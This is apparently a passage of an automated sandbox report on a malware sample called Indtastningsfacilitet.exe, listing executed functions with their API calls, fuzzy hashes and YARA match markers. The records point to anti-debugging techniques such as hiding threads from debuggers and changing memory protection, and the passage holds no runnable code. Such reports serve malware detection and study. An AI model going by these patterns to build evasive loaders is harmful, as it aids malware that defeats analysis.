                              • Instruction ID: 7f207958dc7906a1febc59a6fa1663d7e0c50388dfc575fdfb8d93f2c31004ff
                              • Opcode Fuzzy Hash: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
                              • Instruction Fuzzy Hash: F8512973485204EFCB98CF24EA99B68B716EF65360F00831AD6385B1EDC77859428F91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F449E, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 021F4FA8
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction ID: b65145de6d9520da40e0d57fa77fd9704951ec271b05f6a5c0891b4472326281
                              • Opcode Fuzzy Hash: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction Fuzzy Hash: E4619C77419616DFC648CF24EA6A814BB26FF6A3A0300D399D2241F1FED67419438FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F4450, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 021F4FA8
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction ID: f2de2f5df012698c79f463c4a356a2cb6a297c755876db8538414caec36f6692
                              • Opcode Fuzzy Hash: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction Fuzzy Hash: A2512677409245CFC758CF24DA69A59BB22FFAA360F008359C1A41F2EED7741942CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F4406, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 021F4FA8
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction ID: a1083567ee9d1aa61edb3c55bd971693ed9361f5f0adc357dbbea69b798c78c8
                              • Opcode Fuzzy Hash: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction Fuzzy Hash: 64410CB741A6559FC748CF24E66A915BF21FF6A360B008389C1600F1EFD6741902CFD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F4D2A, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 021F4FA8
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction ID: 3205065433b1a36b8f4baac9a11a2fb7d14865b1ca56cba6a99c9b6447e5307d
                              • Opcode Fuzzy Hash: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction Fuzzy Hash: 0741FEB741A6559F8748CF24E6AA815BF21FF6A3603009399C2601F1FFE6741942CBD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F4449, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 021F4FA8
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction ID: cb4027f54312bc0d0764c650a254e516956a2a93ec9293d7bbf6acbb6114784d
                              • Opcode Fuzzy Hash: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction Fuzzy Hash: 8D21C9BB4156159F8648CF24E65A814BB25EFAA370300D396D2241F1FEE6742A438FE6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F11BE, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction ID: 210d8eb7e34d66c435c7f401808e4c5332d468ffc21cbd8747f863a0d5af847c
                              • Opcode Fuzzy Hash: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction Fuzzy Hash: 5F21BC77409605EFC648CF24EA5DC18BB25FF7A370700D39991241F1EED67425428FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F1141, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction ID: c48eb459f6d103cc0f593e989e4176090a222a58be98e14404491ae247f58f4c
                              • Opcode Fuzzy Hash: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction Fuzzy Hash: A7116B306C4385EEFBB06EB48C44BE93A56AF41704F244219AE7C551D1C7799809CF11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F6D52, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(021F4FFA,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F6D98
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction ID: 0df53f3a37dd56e3f5908a0135369b58b8ae96cd4f2652a1a46c131c59561072
                              • Opcode Fuzzy Hash: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction Fuzzy Hash: A6C08C91C62000AA99B90AB10828E3F04298E89620F004D2CBA37A2100876184008672
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F3FF4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,021F3FD4,021F401A,021F0A54,?,?,?,021F074C,2D9CC76C,DFCB8F12), ref: 021F4008
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                              • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F1AE8, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegSetValueExA.KERNELBASE(?,021F51B1,00000000,00000001,?,?,?,?,?,?,021F12D9,?,?), ref: 021F1AF2
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction ID: 7b67aafb765df1ba0a9075a8e93e6a42cc2380995550fc52504d8c73627d7a6f
                              • Opcode Fuzzy Hash: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction Fuzzy Hash: 3CB092B01502047EFA204A008C0AFB77B1AEB10700F200011BA0494094C6A21C20C524
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F5DFC, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,021F04EE,00000200,021F1C61,?,?,?,?,021F523B,021F5200,021F1457,?,?,00000004,?,00000000), ref: 021F5E0B
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction ID: 1e4b140cf606c8bf0029eb496e81cd6aedcab3da80029c5d0d48980e8bac0d85
                              • Opcode Fuzzy Hash: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction Fuzzy Hash: FBB09275204300BBE650DA10CDC8F5BB7A8BB98700F108804BACA86142C630A804CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F3AFA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction ID: 9e87e462595a512a518c00a17d47155f09dbb2d9b480415b0af4131e7c6f82a4
                              • Opcode Fuzzy Hash: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction Fuzzy Hash: 84A0113028008A22CAA00A203C0AB8823020B82238F300300203AA80E0C8A0828C8202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Analysis Process: Indtastningsfacilitet.exe PID: 6564 Parent PID: 3808 Indtastningsfacilitet.exeCOMMON

                              Executed Functions

                              Function 005612DE, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 206nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 00561321
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationMemoryProtectThreadVirtual
                              • String ID: W.E$1.!T$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 675431017-3275326604
                              • Opcode ID: 0cac671cbe3958ead429a6caa088ff3c9c10bb3b2ad860396315021059ed22e4
                              • Instruction ID: 3c413646716c9ef5c7c5cc6aeb1ac6245076d7ee5e192733224979fdef002469
                              • Opcode Fuzzy Hash: 0cac671cbe3958ead429a6caa088ff3c9c10bb3b2ad860396315021059ed22e4
                              • Instruction Fuzzy Hash: 8A716672500305AFDB14CF20DE4EBA87B21FF69360F104364F9042F2EAD6B89842CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005608B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(005608D9,?,00000000,?,?,?,0056074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 005608BF
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: d5fa75220e6e26fcf73d165fcd5f48852e771e5aae332a5a68a8537d932ab225
                              • Instruction ID: f29dbaae20c425d3c36150f17695fc1f93ea4ace1a178a40895676af6f9cbbbc
                              • Opcode Fuzzy Hash: d5fa75220e6e26fcf73d165fcd5f48852e771e5aae332a5a68a8537d932ab225
                              • Instruction Fuzzy Hash: 273178706403026BEB10EF70CC9ABEA3FA0BF95768F208218BD545B2C2CA74DC02CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568CF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction ID: a899b1b7664c67e1056b200de8aaf7ce3ef8ecd08995899855928226b665b9b3
                              • Opcode Fuzzy Hash: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction Fuzzy Hash: C951DF37505605DFCF18CF24E698B68BB2AFF69320F40936AD5141B2EDD7785882CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00566DB9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1.!T
                              • API String ID: 0-3147410236
                              • Opcode ID: 20157101dc6def3cc541a86f7fe679cdea8ae94032f08d1b36c925fb27a32281
                              • Instruction ID: dcf78a528d26dfb58f90ca6a5762d15b60f1c92cf89e9b9bce06dc0b5d2f84ee
                              • Opcode Fuzzy Hash: 20157101dc6def3cc541a86f7fe679cdea8ae94032f08d1b36c925fb27a32281
                              • Instruction Fuzzy Hash: BE41AB75A00316AFEF10DF64C985B9A7BA0BF88764F158128FD496B391C670ED41CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568DF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction ID: 69f4f784941445cf7b06f083b00f55c2cd70df106563fec89a96faacc6b5a14a
                              • Opcode Fuzzy Hash: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction Fuzzy Hash: FA51BA37505605DFCF18CF24E6A8B68BB2AFF69320F00976AD1140B2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005608EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 15f0d1c0a0df6ad0eff6d6172d1952f6bf21a77d5ab09167a7dba756baa44407
                              • Instruction ID: 10ad13f9dc909477086daaf7b655145d16ef5d547b3af522c2595a0124d60aff
                              • Opcode Fuzzy Hash: 15f0d1c0a0df6ad0eff6d6172d1952f6bf21a77d5ab09167a7dba756baa44407
                              • Instruction Fuzzy Hash: D4410477500316AFCA48CF24EA9EF18BB15FFA9360F008355E6142F2EDD6B459428F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568F0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction ID: 626b35e84c7816701acef4cae1910b79549bbb0ec7997fbe357e21977b0123df
                              • Opcode Fuzzy Hash: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction Fuzzy Hash: 8441AC33505605DFCF18CF24EAA9B68BB2AFF69360F00935AD1141B2EDD7785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00569012, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction ID: fabdbb33dd26c5636d8354eb7e0a6cf1af948ba86d3c173f929e139e73460361
                              • Opcode Fuzzy Hash: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction Fuzzy Hash: 8541A937505609DFCF18CF24E699B68BB2AFF69320F00935AD1141F2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005670B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 422e4b865983cf80190ca511d1ea269efe919bba7deb6b17335d1bdbf97eb727
                              • Instruction ID: 88a8ed6113478ed7a0241bb56121b4510bf64664752745d5a1e80b44dc1851fd
                              • Opcode Fuzzy Hash: 422e4b865983cf80190ca511d1ea269efe919bba7deb6b17335d1bdbf97eb727
                              • Instruction Fuzzy Hash: A0212970740305AEFF109E608C99BEA3FA1FF49768F604129FE451B2D1D6B5DC42CA41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00568CE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 00569110
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1778838933-2268763764
                              • Opcode ID: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction ID: b9861291e0e1e81f409ccd466e6b40df4ff196bdf395ce145f4bd521fff20e8b
                              • Opcode Fuzzy Hash: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction Fuzzy Hash: EB31F931704205CEEF299E24C5987BC3F6ABF65318FA95A6FC9468B2D5C33488C4C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00567088, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0056074C), ref: 00560A4D
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: abdac5ac15c88742f8fb1516a417ddd47e5346fb259b23d0cfd0c5117cadf4f5
                              • Instruction ID: cce887d98398a79ea7cb92bfdc68a94171836a634a4dbc622a1ab6cbb0c58529
                              • Opcode Fuzzy Hash: abdac5ac15c88742f8fb1516a417ddd47e5346fb259b23d0cfd0c5117cadf4f5
                              • Instruction Fuzzy Hash: 502127B0740306ABFF109F648C8ABDA7FA1BF85768F244210BE542B2C1C6B4DC01CB44
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056911A, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction ID: 147c4664dece1ed45563ef1f1059a0514da08ebf4e7729e00354ee891242ae0d
                              • Opcode Fuzzy Hash: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction Fuzzy Hash: 0B41AB33505605DFCF18CF24EA98B68BB29FF6A320F04935AD1141F2EDD6785982CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005692AE, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000004), ref: 005693D6
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction ID: e800fc2805cab09a815f96ffe5f849df3ac874ba31454b77be498a9a2c379686
                              • Opcode Fuzzy Hash: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction Fuzzy Hash: 8D319977415516DF8A4CCF24E69D828BB2AFFAA370300935AD2141F2FDD67419828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 005687FD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005682E2,00000040,00560A2A,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00568816
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                              • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00562A8A, Relevance: 1.3, APIs: 1, Instructions: 93sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00009402,00000000,00000000,00000000), ref: 00562BFB
                              Memory Dump Source
                              • Source File: 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
